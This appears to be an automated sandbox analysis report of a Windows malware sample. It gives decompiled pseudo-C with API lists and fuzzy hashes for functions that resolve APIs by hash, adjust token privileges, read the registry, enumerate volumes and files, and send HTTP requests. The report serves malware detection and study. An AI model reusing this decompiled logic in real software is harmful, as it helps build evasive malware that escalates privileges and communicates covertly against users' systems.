				char _v20;
				intOrPtr _v22;
				intOrPtr _v288;
				intOrPtr _v296;
				intOrPtr _v300;
				char _v304;
				char _v352;
				char _v400;
				struct _WIN32_FIND_DATAW _v992;
				intOrPtr* _t33;
				void* _t34;
				intOrPtr _t36;
				WCHAR* _t38;
				void* _t40;
				signed int _t50;
				int _t53;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t64;
				char* _t76;
				intOrPtr _t77;
				void* _t80;
				intOrPtr _t81;
				void* _t82;
				void* _t84;
				void* _t86;
				void* _t92;

				_t76 =  &_v304;
				E0080AF10(_t76, 0x11c);
				_v304 = 0x11c;
				_t33 = E0081F5C0(0, 0x44f8007);
				_t84 = _t82 + 0x10;
				_t34 =  *_t33(_t76);
				_t64 = 0;
				if(_t34 == 0 || _v288 != 2) {
					L34:
					return _t64;
				} else {
					_t36 = _v22;
					if(_t36 + 0xfe >= 2) {
						if(_t36 != 1) {
							goto L34;
						}
						_t77 = _v300;
						if(_t77 == 6) {
							if(_v296 == 0) {
								_t64 = 4;
								goto L34;
							}
							_t64 = 6;
							if(_v296 != 1) {
								L22:
								_t38 = E0080F180(0x823ae0,  &_v352);
								E0081F5C0(0, 0xae63487);
								_t86 = _t84 + 0x10;
								_t40 = FindFirstFileW(_t38,  &_v992); // executed
								if(_t40 == 0xffffffff) {
									L29:
									if(E00815100() == 0) {
										_t64 = 0xa;
									} else {
										_t64 = ( !(E00805BF0(E00809B90(_t41, E00801250(0x823a50,  &_v20)), 0)) & 1) + ( !(E00805BF0(E00809B90(_t41, E00801250(0x823a50,  &_v20)), 0)) & 1) + 8;
										E008046C0(_t41);
									}
									goto L34;
								}
								_t80 = _t40;
								do {
									_t65 = _v992.dwFileAttributes;
									_t50 = E00808AE0(0x82efa9c);
									E00808AE0(0x82efa9c);
									_t92 = _t86 + 8;
									if(( !(_t50 ^ _v992.dwFileAttributes) & _t65) == 0) {
										goto L24;
									}
									_t57 = E00801010( &(_v992.cFileName), E0080F180(0x823660,  &_v400));
									_t92 = _t92 + 0x10;
									if(_t57 == 0) {
										goto L24;
									}
									_t64 = 0xc;
									goto L34;
									L24:
									E0081F5C0(0, 0x2a85667);
									_t86 = _t92 + 8;
									_t53 = FindNextFileW(_t80,  &_v992); // executed
								} while (_t53 != 0);
								goto L29;
							}
							goto L34;
						}
						if(_t77 != 5) {
							_t58 = E00808AE0(0x82efa89);
							_t84 = _t84 + 4;
							if(_t77 <= _t58) {
								goto L34;
							}
							goto L22;
						} else {
							if(_v296 == 0) {
								_t64 = 1;
							} else {
								_t64 = 2;
								if(_v296 != 1) {
									_t64 = (0 | _v296 == 0x00000002) + (0 | _v296 == 0x00000002);
								}
							}
							goto L34;
						}
					}
					_t81 = _v300;
					if(_t81 == 6) {
						if(_v296 == 0) {
							_t64 = 5;
							goto L34;
						}
						_t64 = 7;
						if(_v296 == 1) {
							goto L34;
						}
						_t64 = 9;
						if(_v296 == 2) {
							goto L34;
						}
						_t59 = E00808AE0(0x82efa8f);
						_t84 = _t84 + 4;
						_t64 = 0xb;
						if(_v296 != _t59) {
							L6:
							_t64 = ( !(E00807600(_t81, 5)) & 1) + ( !(E00807600(_t81, 5)) & 1) * 8;
							goto L34;
						}
						goto L34;
					}
					if(_t81 != 5) {
						goto L6;
					}
					_t64 = 3;
					if(_v296 == 2) {
						goto L34;
					}
					goto L6;
				}
			}































    0x008215dc
    0x008215e8
    0x008215f0
    0x00821601
    0x00821606
    0x0082160a
    0x0082160c
    0x00821610
    0x00821868
    0x00821874
    0x00821623
    0x00821623
    0x0082162e
    0x00821673
    0x00000000
    0x00000000
    0x00821679
    0x00821682
    0x00821720
    0x0082185c
    0x00000000
    0x0082185c
    0x00821726
    0x00821732
    0x0082174e
    0x0082175a
    0x0082176b
    0x00821770
    0x0082177b
    0x00821780
    0x0082180d
    0x00821814
    0x00821863
    0x00821816
    0x00821846
    0x0082184b
    0x00821850
    0x00000000
    0x00821814
    0x00821786
    0x008217ad
    0x008217ad
    0x008217b8
    0x008217cb
    0x008217d0
    0x008217d5
    0x00000000
    0x00000000
    0x008217f3
    0x008217f8
    0x008217fd
    0x00000000
    0x00000000
    0x008217ff
    0x00000000
    0x00821790
    0x00821797
    0x0082179c
    0x008217a7
    0x008217a9
    0x00000000
    0x008217ad
    0x00000000
    0x00821734
    0x0082168b
    0x0082173e
    0x00821743
    0x00821748
    0x00000000
    0x00000000
    0x00000000
    0x00821691
    0x00821698
    0x00821855
    0x0082169e
    0x0082169e
    0x008216aa
    0x008216bc
    0x008216bc
    0x008216aa
    0x00000000
    0x00821698
    0x0082168b
    0x00821630
    0x00821639
    0x008216ca
    0x00821806
    0x00000000
    0x00821806
    0x008216d0
    0x008216dc
    0x00000000
    0x00000000
    0x008216e2
    0x008216ee
    0x00000000
    0x00000000
    0x008216ff
    0x00821704
    0x00821707
    0x0082170e
    0x00821656
    0x00821669
    0x00000000
    0x00821669
    0x00000000
    0x00821714
    0x00821642
    0x00000000
    0x00000000
    0x00821644
    0x00821650
    0x00000000
    0x00000000
    0x00000000
    0x00821650

    APIs
    • FindFirstFileW.KERNEL32(00000000,?), ref: 0082177B
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: FileFindFirst
    • String ID:
    • API String ID: 1974802433-0
    • Opcode ID: 0c721c7cf2d995ee37350886d5afea4968870cd8800d3d1b3bdade1d9a1e74d0
    • Instruction ID: 61d9b3eda050bc3b426f1b07fe814fee1a0ba9a5ea9f16482c44a037aa9120ed
    • Opcode Fuzzy Hash: 0c721c7cf2d995ee37350886d5afea4968870cd8800d3d1b3bdade1d9a1e74d0
    • Instruction Fuzzy Hash: 87512A72D003389BDF305554BC8A7EE3268FB26315F1400B1E95DE6182EA755EC8CEA3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0080E070, Relevance: 1.6, APIs: 1, Instructions: 103COMMON
    Download Yara Rule
    C-Code - Quality: 28%
    			E0080E070(void* __eflags, intOrPtr _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v36;
				signed int _t12;
				intOrPtr* _t14;
				intOrPtr* _t15;
				void* _t16;
				intOrPtr* _t21;
				intOrPtr* _t23;
				int _t27;
				intOrPtr* _t28;
				signed int _t30;
				intOrPtr* _t32;
				signed int _t34;
				signed int _t35;
				void** _t37;
				void* _t43;
				void* _t47;
				void* _t48;

				_t12 = E00808AE0(0x82efa85);
				_t14 = E0081F5C0(_t12, E00808AE0(0x3cf15e2));
				_t15 = E0081F5C0(0, 0x160d384);
				_t47 = _t43 + 0x18;
				_t16 =  *_t15();
				_t37 =  &_v20;
				_push(_t37);
				_push(0);
				_push(0x20);
				_push(_t16);
				if( *_t14() != 0) {
					L2:
					_v36.PrivilegeCount = 1;
					_v24 = (_a8 & 0x000000ff) + (_a8 & 0x000000ff);
					_t21 = E0081F5C0(9, 0xa2414e7);
					_t48 = _t47 + 8;
					_push( &(_v36.Privileges));
					_push(_a4);
					_push(0);
					if( *_t21() == 0) {
						L5:
						_t35 = 0;
					} else {
						E0081F5C0(9, 0xc8d1a33);
						_t48 = _t48 + 8;
						_t27 = AdjustTokenPrivileges(_v20, 0,  &_v36, 0, 0, 0); // executed
						if(_t27 == 0) {
							goto L5;
						} else {
							_t28 = E0081F5C0(0, 0xc702be2);
							_t48 = _t48 + 8;
							_t35 = _t34 & 0xffffff00 |  *_t28() == 0x00000000;
						}
					}
					_t23 = E0081F5C0(0, 0xb8e7db5);
					 *_t23(_v20);
				} else {
					_t30 = E00808AE0(0x82efa85);
					_t32 = E0081F5C0(_t30, E00808AE0(0x7058432));
					_t47 = _t47 + 0x10;
					_push(_t37);
					_push(0x20);
					_push(0xffffffff);
					if( *_t32() == 0) {
						_t35 = 0;
					} else {
						goto L2;
					}
				}
				return _t35;
			}






















    0x0080e07e
    0x0080e097
    0x0080e0a8
    0x0080e0ad
    0x0080e0b0
    0x0080e0b2
    0x0080e0b5
    0x0080e0b6
    0x0080e0b8
    0x0080e0ba
    0x0080e0bf
    0x0080e0f6
    0x0080e0fc
    0x0080e10b
    0x0080e115
    0x0080e11a
    0x0080e11d
    0x0080e11e
    0x0080e11f
    0x0080e125
    0x0080e163
    0x0080e163
    0x0080e127
    0x0080e12e
    0x0080e133
    0x0080e145
    0x0080e149
    0x00000000
    0x0080e14b
    0x0080e152
    0x0080e157
    0x0080e15e
    0x0080e15e
    0x0080e149
    0x0080e16c
    0x0080e177
    0x0080e0c1
    0x0080e0c6
    0x0080e0df
    0x0080e0e4
    0x0080e0e7
    0x0080e0e8
    0x0080e0ea
    0x0080e0f0
    0x0080e183
    0x00000000
    0x00000000
    0x00000000
    0x0080e0f0
    0x0080e182

    APIs
    • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 0080E145
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: AdjustLibraryLoadPrivilegesToken
    • String ID:
    • API String ID: 1509250347-0
    • Opcode ID: a2d3f3b228e42fc462a3bc1dc47c402564b005106094cfa130b61bfce17124e1
    • Instruction ID: 17d8688349d5395db0cc7415f53e8c3ca9bf12dda52ce3b37c86e4ce186e693e
    • Opcode Fuzzy Hash: a2d3f3b228e42fc462a3bc1dc47c402564b005106094cfa130b61bfce17124e1
    • Instruction Fuzzy Hash: 552180B2E802113AE7502AE86C03FAF351CEF51B59F080535FE19E52C2F9A19A1441B3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 008124B0, Relevance: 6.1, APIs: 4, Instructions: 104registryCOMMON
    Download Yara Rule
    C-Code - Quality: 97%
    			E008124B0(void* __eax, void* _a4, short* _a8, short* _a12, int* _a16, char** _a20) {
				int _v20;
				signed char _t22;
				long _t24;
				long _t27;
				signed char _t28;
				void* _t31;
				char* _t33;
				long _t35;
				char** _t46;
				int _t48;
				char* _t50;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t58;

				_push(__eax);
				 *_a20 = 0;
				_t22 = E008128A0(_a20, _t58, 0xffffffff);
				E0081F5C0(9, 0xda29a27);
				_t53 = _t51 + 0xc;
				_t24 = RegOpenKeyExW(_a4, _a8, 0, (_t22 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
				_t48 = 0xffffffff;
				if(_t24 == 0) {
					_t46 = _a20;
					_v20 = 0;
					E0081F5C0(9, 0x8097c7);
					_t55 = _t53 + 8;
					_t27 = RegQueryValueExW(_a4, _a12, 0, _a16, 0,  &_v20); // executed
					if(_t27 == 0) {
						_t38 = _v20;
						_t28 = E00804C00(_v20, 0);
						_t55 = _t55 + 8;
						_t48 = 0;
						__eflags = _t28 & 0x00000001;
						if((_t28 & 0x00000001) == 0) {
							_t31 = E00802640(_t38 + 0x214148fa, 0x214148f6);
							E00808AE0(0x82efa88);
							_t33 = E0081D310(_t31);
							_t55 = _t55 + 0x10;
							__eflags = _t33;
							if(_t33 == 0) {
								goto L2;
							} else {
								_t50 = _t33;
								E0081F5C0(9, 0x8097c7);
								_t55 = _t55 + 8;
								_t35 = RegQueryValueExW(_a4, _a12, 0, _a16, _t50,  &_v20); // executed
								__eflags = _t35;
								if(_t35 == 0) {
									 *_t46 = _t50;
									_t48 = _v20;
								} else {
									E008046C0(_t50);
									_t55 = _t55 + 4;
									goto L2;
								}
							}
						}
					} else {
						L2:
						_t48 = 0xffffffff;
					}
					E0081F5C0(9, 0x3111c69);
					_t53 = _t55 + 8;
					RegCloseKey(_a4); // executed
				}
				return _t48;
			}


















    0x008124b6
    0x008124c0
    0x008124c8
    0x008124e0
    0x008124e5
    0x008124f1
    0x008124f3
    0x008124fa
    0x00812500
    0x00812503
    0x00812511
    0x00812516
    0x0081252a
    0x0081252e
    0x00812537
    0x0081253d
    0x00812542
    0x00812545
    0x00812547
    0x00812549
    0x00812557
    0x00812566
    0x0081256f
    0x00812574
    0x00812577
    0x00812579
    0x00000000
    0x0081257b
    0x0081257b
    0x00812584
    0x00812589
    0x0081259c
    0x0081259e
    0x008125a0
    0x008125ad
    0x008125af
    0x008125a2
    0x008125a3
    0x008125a8
    0x00000000
    0x008125a8
    0x008125a0
    0x00812579
    0x00812530
    0x00812530
    0x00812530
    0x00812530
    0x008125b9
    0x008125be
    0x008125c4
    0x008125c4
    0x008125cf

    APIs
    • RegOpenKeyExW.KERNEL32(00000000,?,00000000,00000000,?,?,?,00000000), ref: 008124F1
    • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 0081252A
    • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 0081259C
    • RegCloseKey.KERNEL32(?), ref: 008125C4
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: QueryValue$CloseOpen
    • String ID:
    • API String ID: 1586453840-0
    • Opcode ID: 857bee3bcbea923aaf42bf097b010d9f1774328087c06d4f03afca3265acf286
    • Instruction ID: dc32b9cc673bc4c591240305464f77417099e371568d473530c69c36a82285f9
    • Opcode Fuzzy Hash: 857bee3bcbea923aaf42bf097b010d9f1774328087c06d4f03afca3265acf286
    • Instruction Fuzzy Hash: F231A7B29402157BEB509E54AC42FEB361DFF15764F080520FE19E62C2F671EA6186F2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00810ED0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184networkCOMMON
    Download Yara Rule
    C-Code - Quality: 82%
    			E00810ED0(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20, signed int _a24) {
				char _v20;
				char _v24;
				void* _v28;
				signed char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v56;
				char _v65;
				char _v85;
				char _v597;
				signed int _t47;
				void* _t52;
				intOrPtr* _t54;
				void* _t56;
				void* _t60;
				void* _t61;
				void* _t64;
				char* _t68;
				int _t69;
				intOrPtr* _t72;
				void* _t73;
				signed char _t75;
				intOrPtr* _t77;
				void* _t78;
				void* _t79;
				intOrPtr* _t82;
				signed int _t99;
				signed char _t100;
				long _t104;
				char* _t105;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t119;
				void* _t123;

				_t129 = __eflags;
				_t47 = E0080B9F0(__eflags, _a24 & 0x00000004, 0);
				_v32 = _t47;
				E00821BB0( &_v56, _t129, E00801250(0x82389b,  &_v44));
				_v40 = E00822160( &_v56);
				_v36 = 0;
				_t52 = E00808AE0(0x82efa9f);
				_t54 = E0081F5C0(_t52, E00808AE0(0x3c56e1d));
				_t56 = E00801250(0x824002,  &_v65);
				_t96 =  ==  ? 0x82351e : "<}a5U\rVD";
				_t60 = E00801250( ==  ? 0x82351e : "<}a5U\rVD",  &_v597);
				_t119 = _t112 + 0x30;
				_t61 =  *_t54(_a4, _t60, _a8, _t56, _a12,  &_v40, (_t47 & 0x00000001) << 0x00000017 | 0x8404c700, 0);
				_t109 = 0;
				if(_t61 != 0) {
					_v28 = _t61;
					_t104 = _a20;
					_t110 = _a16;
					if((_v32 & 0x00000001) != 0) {
						_v20 = 0;
						_v24 = 4;
						_t77 = E0081F5C0(0x13, 0x85dc001);
						_t78 = E00808AE0(0x82efa93);
						_t119 = _t119 + 0xc;
						_t105 =  &_v20;
						_t111 = _v28;
						_t79 =  *_t77(_t111, _t78, _t105,  &_v24);
						_t133 = _t79;
						if(_t79 != 0) {
							_v20 = E0080A420(_t133, _v20, E00808AE0(0x82fc90c));
							_t82 = E0081F5C0(0x13, 0x5b4d601);
							_t119 = _t119 + 0x14;
							 *_t82(_t111, 0x1f, _t105, 4);
						}
						_t110 = _a16;
						_t104 = _a20;
					}
					_t64 = E00808AE0(0x82efa9f);
					E0081F5C0(_t64, E00808AE0(0x33b801d));
					_t68 = E00801250(0x823b70,  &_v85);
					_t123 = _t119 + 0x18;
					_t109 = _v28;
					_t69 = HttpSendRequestA(_t109, _t68, 0x13, _t110, _t104); // executed
					if(_t69 == 0) {
						L8:
						E0081F5C0(0x13, 0x714b685);
						InternetCloseHandle(_t109); // executed
						_t109 = 0;
					} else {
						_v20 = 0;
						_v24 = 4;
						_t72 = E0081F5C0(0x13, 0x249c261);
						_t73 = E00808AE0(0x282efa9f);
						_t123 = _t123 + 0xc;
						_t99 =  &_v24;
						_t75 =  *_t72(_t109, _t73,  &_v20, _t99, 0) & 0xffffff00 | _t74 == 0x00000000;
						_t100 = _t99 & 0xffffff00 | _v20 != 0x000000c8;
						if((_t75 & _t100) != 0 || (_t75 ^ _t100) != 0) {
							goto L8;
						}
					}
				}
				E00822960( &_v56);
				return _t109;
			}








































    0x00810ed0
    0x00810ee5
    0x00810eef
    0x00810f15
    0x00810f21
    0x00810f24
    0x00810f30
    0x00810f49
    0x00810f5c
    0x00810f75
    0x00810f80
    0x00810f85
    0x00810f9a
    0x00810f9c
    0x00810fa0
    0x00810fa6
    0x00810fa9
    0x00810fac
    0x00810fb3
    0x00810fb5
    0x00810fbc
    0x00810fca
    0x00810fd9
    0x00810fde
    0x00810fe4
    0x00810fea
    0x00810fee
    0x00810ff0
    0x00810ff2
    0x0081100e
    0x00811018
    0x0081101d
    0x00811026
    0x00811026
    0x00811028
    0x0081102b
    0x0081102b
    0x00811033
    0x0081104c
    0x0081105f
    0x00811064
    0x0081106c
    0x00811070
    0x00811074
    0x008110c7
    0x008110ce
    0x008110d7
    0x008110d9
    0x00811076
    0x00811076
    0x0081107d
    0x0081108b
    0x0081109a
    0x0081109f
    0x008110a2
    0x008110b2
    0x008110bc
    0x008110c1
    0x00000000
    0x00000000
    0x008110c1
    0x00811074
    0x008110de
    0x008110ef

    APIs
    • HttpSendRequestA.WININET(?,00000000,00000013,00000000,?), ref: 00811070
    • InternetCloseHandle.WININET(?), ref: 008110D7
      • Part of subcall function 0081F5C0: LoadLibraryA.KERNEL32(?), ref: 0081F82C
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: CloseHandleHttpInternetLibraryLoadRequestSend
    • String ID: <}a5UVD
    • API String ID: 253643169-4191014945
    • Opcode ID: 1b5f55b0a67350ffc3146d08d766b704d184ab16f6d192eef0a726c712a28768
    • Instruction ID: e17e2eb68bcac3d8dcda3c59192ed7a37e2820f9d55c7b04283b432e9ff454ac
    • Opcode Fuzzy Hash: 1b5f55b0a67350ffc3146d08d766b704d184ab16f6d192eef0a726c712a28768
    • Instruction Fuzzy Hash: 5E5198B1E002156BEF109AA4AC46BFF366CFF05714F040024FA05F6242E6755E5587B7
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00810420, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
    Download Yara Rule
    C-Code - Quality: 46%
    			E00810420(void* __eflags, intOrPtr _a4) {
				short _v440;
				char _v516;
				char _v536;
				char _v1056;
				intOrPtr* _t8;
				void* _t9;
				void* _t10;
				intOrPtr* _t11;
				intOrPtr* _t14;
				void* _t15;
				intOrPtr* _t18;
				intOrPtr* _t21;
				void* _t23;
				intOrPtr* _t25;
				intOrPtr* _t27;
				intOrPtr* _t29;
				void* _t30;
				void* _t31;
				char* _t32;
				char* _t33;
				void* _t38;
				void* _t40;

				_t8 = E0081F5C0(8, 0x3a5687);
				_t9 = E00808AE0(0x82efaa8);
				_t40 = _t38 + 0xc;
				_t32 =  &_v1056;
				_t10 =  *_t8(0, _t9, 0, 0, _t32); // executed
				if(_t10 == 0) {
					_t11 = E0081F5C0(3, 0x55e8477);
					 *_t11(_t32);
					_t14 = E0081F5C0(0, E00808AE0(0x796236b));
					_t40 = _t40 + 0x14;
					_t33 =  &_v536;
					_t15 =  *_t14(_t32, _t33, 0x104); // executed
					if(_t15 != 0) {
						L7:
						if(_v516 != 0x7b) {
							goto L1;
						}
						_v440 = 0;
						_t18 = E0081F5C0(0xc, 0xd513d37);
						_t40 = _t40 + 8;
						_push(_a4);
						_push( &_v516);
						if( *_t18() != 0) {
							goto L1;
						}
						return 1;
					}
					0;
					while(1) {
						_t21 = E0081F5C0(3, 0xd0682f7);
						 *_t21(_t32);
						_t23 = E00808AE0(0x82efa8f);
						_t25 = E0081F5C0(_t23, E00808AE0(0xc02d51b));
						_t40 = _t40 + 0x18;
						_push(_t32);
						if( *_t25() == 0) {
							goto L1;
						}
						_t27 = E0081F5C0(3, 0x55e8477);
						 *_t27(_t32);
						_t29 = E0081F5C0(0, 0xfb8d9e7);
						_t30 = E00808AE0(0x82efb88);
						_t40 = _t40 + 0x14;
						_t31 =  *_t29(_t32, _t33, _t30); // executed
						if(_t31 == 0) {
							continue;
						}
						goto L7;
					}
				}
				L1:
				E0080AF10(_a4, 0x10);
				return 0;
			}

























    0x00810433
    0x00810442
    0x00810447
    0x0081044a
    0x00810458
    0x0081045c
    0x0081047f
    0x00810488
    0x0081049a
    0x0081049f
    0x008104a2
    0x008104af
    0x008104b3
    0x0081053c
    0x00810544
    0x00000000
    0x00000000
    0x00810550
    0x00810560
    0x00810565
    0x00810568
    0x0081056b
    0x00810570
    0x00000000
    0x00000000
    0x00000000
    0x00810576
    0x008104bf
    0x008104c0
    0x008104c7
    0x008104d0
    0x008104d7
    0x008104f0
    0x008104f5
    0x008104f8
    0x008104fd
    0x00000000
    0x00000000
    0x0081050a
    0x00810513
    0x0081051c
    0x0081052b
    0x00810530
    0x00810536
    0x0081053a
    0x00000000
    0x00000000
    0x00000000
    0x0081053a
    0x008104c0
    0x0081045e
    0x00810463
    0x00000000

    APIs
    • GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000104), ref: 008104AF
    • GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000000), ref: 00810536
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: Volume$MountNamePoint
    • String ID: {
    • API String ID: 1269602640-366298937
    • Opcode ID: ba74647f05f3f9978a698a5b29d0bf71b7ba8fdc8241710126e8e22cfa3f839c
    • Instruction ID: c0f2c219ed73c16c2367fcef69ddf1cd545b48036938718fb2c1e4a23f394941
    • Opcode Fuzzy Hash: ba74647f05f3f9978a698a5b29d0bf71b7ba8fdc8241710126e8e22cfa3f839c
    • Instruction Fuzzy Hash: B4214CA6A8071526F62036A86C43FFA251CEF61B4DF044471FE4DE4183F9E29AD445B7
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00821090, Relevance: 4.6, APIs: 3, Instructions: 132filememoryCOMMON
    Download Yara Rule
    C-Code - Quality: 80%
    			E00821090(void* __eflags, WCHAR* _a4, void** _a8, signed int _a12) {
				void* _v16;
				char _v32;
				intOrPtr _v36;
				void* _v40;
				long _v44;
				void* _t30;
				signed char _t31;
				void* _t32;
				intOrPtr* _t33;
				signed char _t35;
				intOrPtr* _t36;
				void* _t38;
				long _t40;
				long _t41;
				void* _t42;
				int _t44;
				intOrPtr* _t45;
				long _t49;
				void** _t55;
				signed int _t59;
				void* _t66;
				void* _t69;
				void* _t73;
				void* _t74;

				_t74 = __eflags;
				_t48 = _a12;
				E0081F5C0(0, 0xad68947);
				E008088A0(_t74, _a12 ^ 0xfffffffd, _t48);
				E008088A0(_t74, _t48, E00808AE0(0x82efa8e));
				_t55 = _a8;
				_t51 =  ==  ? 1 : 7;
				_t30 = CreateFileW(_a4, 0x80000000,  ==  ? 1 : 7, 0, 3, 0, 0); // executed
				_t55[2] = _t30;
				_t31 = E00805BF0(_t30, 0xffffffff);
				_t66 = (_t59 & 0xfffffff8) - 0x18 + 0x24;
				if((_t31 & 0x00000001) != 0) {
					L4:
					_t32 = 0;
				} else {
					_t33 = E0081F5C0(0, 0x16bdb88);
					_t35 = E00804C00( *_t33(_t55[2],  &_v32), 0);
					_t69 = _t66 + 0x10;
					if((_t35 & 0x00000001) != 0 || _v36 != 0) {
						L3:
						_t36 = E0081F5C0(0, 0xb8e7db5);
						 *_t36(_t55[2]);
						goto L4;
					} else {
						_t38 = _v40;
						_t55[1] = _t38;
						__eflags = _t38;
						if(_t38 == 0) {
							 *_t55 = 0;
							_t32 = 1;
						} else {
							E0081F5C0(0, 0x1f8cae3);
							_t49 = _t55[1];
							_t40 = E00808AE0(0x82eca8c);
							_t41 = E00808AE0(0x82efa88);
							_t69 = _t69 + 0x10;
							_t55 = _a8;
							_t42 = VirtualAlloc(0, _t49, _t40, _t41); // executed
							 *_t55 = _t42;
							__eflags = _t42;
							if(_t42 == 0) {
								goto L3;
							} else {
								E0081F5C0(0, 0xb7ac9a5);
								_t73 = _t69 + 8;
								_t44 = ReadFile(_t55[2],  *_t55, _t55[1],  &_v44, 0); // executed
								__eflags = _t44;
								if(_t44 == 0) {
									L12:
									_t45 = E0081F5C0(0, 0xb1fd105);
									_t69 = _t73 + 8;
									 *_t45( *_t55, 0, 0x8000);
									goto L3;
								} else {
									__eflags = _v44 - _t55[1];
									if(_v44 != _t55[1]) {
										goto L12;
									} else {
										_t32 = 1;
									}
								}
							}
						}
					}
				}
				return _t32;
			}



























    0x00821090
    0x0082109c
    0x008210a6
    0x008210b7
    0x008210d0
    0x008210da
    0x008210e7
    0x008210fb
    0x008210fd
    0x00821103
    0x00821108
    0x0082110d
    0x00821152
    0x00821152
    0x0082110f
    0x00821116
    0x0082112b
    0x00821130
    0x00821135
    0x0082113e
    0x00821145
    0x00821150
    0x00000000
    0x0082115c
    0x0082115c
    0x00821160
    0x00821163
    0x00821165
    0x008211db
    0x008211e1
    0x00821167
    0x0082116e
    0x00821178
    0x00821180
    0x0082118f
    0x00821194
    0x00821199
    0x0082119f
    0x008211a1
    0x008211a3
    0x008211a5
    0x00000000
    0x008211a7
    0x008211ae
    0x008211b3
    0x008211c5
    0x008211c7
    0x008211c9
    0x008211e8
    0x008211ef
    0x008211f4
    0x00821200
    0x00000000
    0x008211cb
    0x008211cf
    0x008211d2
    0x00000000
    0x008211d4
    0x008211d4
    0x008211d4
    0x008211d2
    0x008211c9
    0x008211a5
    0x00821165
    0x00821135
    0x0082115b

    APIs
    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?), ref: 008210FB
    • VirtualAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0082119F
    • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 008211C5
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: File$AllocCreateReadVirtual
    • String ID:
    • API String ID: 3585551309-0
    • Opcode ID: 1635c8c5ca5f72dcb1ae71b59bcec94847d9ab7d17827dbe54a6838f3d548b95
    • Instruction ID: e758190a80064c96e37c929c64adab1b2eb2e47fe8250af4194dbc17fee17ecf
    • Opcode Fuzzy Hash: 1635c8c5ca5f72dcb1ae71b59bcec94847d9ab7d17827dbe54a6838f3d548b95
    • Instruction Fuzzy Hash: D7411BB5A402017BEA106A64EC07F69B758FF11715F144135FA19E62C2FB71E96087B3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 008105D0, Relevance: 4.6, APIs: 3, Instructions: 115COMMON
    Download Yara Rule
    C-Code - Quality: 67%
    			E008105D0(intOrPtr _a4) {
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr* _t12;
				int _t16;
				intOrPtr* _t21;
				void* _t23;
				int _t25;
				intOrPtr* _t27;
				signed char* _t28;
				void* _t33;
				intOrPtr* _t34;
				DWORD* _t35;
				signed char* _t36;
				void* _t38;
				intOrPtr _t40;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t47;

				_v20 = 0;
				_t12 = E0081F5C0(9, 0xf2b7ebe);
				_t42 = _t41 + 8;
				_push( &_v20);
				_push(8);
				_push(_a4);
				if( *_t12() == 0) {
					_t40 = 0xffffffff;
					L12:
					return _t40;
				}
				E0081F5C0(9, 0xbd557e);
				_t43 = _t42 + 8;
				_t35 =  &_v24;
				_t16 = GetTokenInformation(_v20, 0x19, 0, 0, _t35); // executed
				_t40 = 0xffffffff;
				if(_t16 != 0) {
					L10:
					E0081F5C0(0, E00808AE0(0x3a08739));
					FindCloseChangeNotification(_v20); // executed
					goto L12;
				}
				_t21 = E0081F5C0(0, E00808AE0(0x45ed16e));
				_t43 = _t43 + 0xc;
				if( *_t21() != 0x7a) {
					goto L10;
				}
				_t23 = E0081D310(_v24);
				_t43 = _t43 + 4;
				if(_t23 != 0) {
					_t38 = _t23;
					E0081F5C0(9, 0xbd557e);
					_t47 = _t43 + 8;
					_t25 = GetTokenInformation(_v20, 0x19, _t38, _v24, _t35); // executed
					_t40 = 0xffffffff;
					if(_t25 != 0) {
						_t27 = E0081F5C0(9, 0x8847844);
						_t47 = _t47 + 8;
						_t28 =  *_t27( *_t38);
						if(_t28 != 0) {
							_t36 = _t28;
							if( *_t28 != 0) {
								_v28 = E0081F5C0(9, 0x7a1c189);
								_t33 = E00802640(0, E00802640(0,  *_t36 & 0x000000ff) + 1);
								_t47 = _t47 + 0x18;
								_t34 = _v28( *_t38, _t33);
								if(_t34 != 0) {
									_t40 =  *_t34;
								}
							}
						}
					}
					E008046C0(_t38);
					_t43 = _t47 + 4;
				}
			}























    0x008105dc
    0x008105ea
    0x008105ef
    0x008105f5
    0x008105f6
    0x008105f8
    0x008105fd
    0x00810708
    0x0081070d
    0x00810716
    0x00810716
    0x0081060a
    0x0081060f
    0x00810612
    0x0081061f
